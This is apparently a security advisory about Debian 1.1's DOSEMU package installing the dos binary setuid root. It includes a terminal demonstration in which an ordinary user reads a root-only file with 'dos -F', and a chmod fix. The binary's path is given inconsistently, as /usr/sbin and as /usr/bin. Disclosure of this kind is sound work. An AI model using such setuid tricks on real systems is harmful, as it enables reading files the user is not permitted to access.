COMMAND

    /usr/sbin/dos

SYSTEMS AFFECTED

	Debian's 1.1 DOSEMU

PROBLEM

    In Debian 1.1, the optional DOSEMU package installs  /usr/sbin/dos
    setuid  root.   This  is  a  serious  security  hole  which can be
    exploited to gain access to any file on the system.  Version of
    package was 0.64.0.2-9.

        $ cat /etc/debian_version
        1.1
        $ id
        uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
        [quinlan:~]$ ls -al /usr/bin/dos
        -rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
        $ ls -al /root/foo
        -rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
        $ dos -F /root/foo
        [ Prints /root/foo, which is not readable by user `quinlan'. ]

SOLUTION

    This security hole can be corrected by removing the suid bit  from
    /usr/bin/dos:

        $ chmod u-s /usr/bin/dos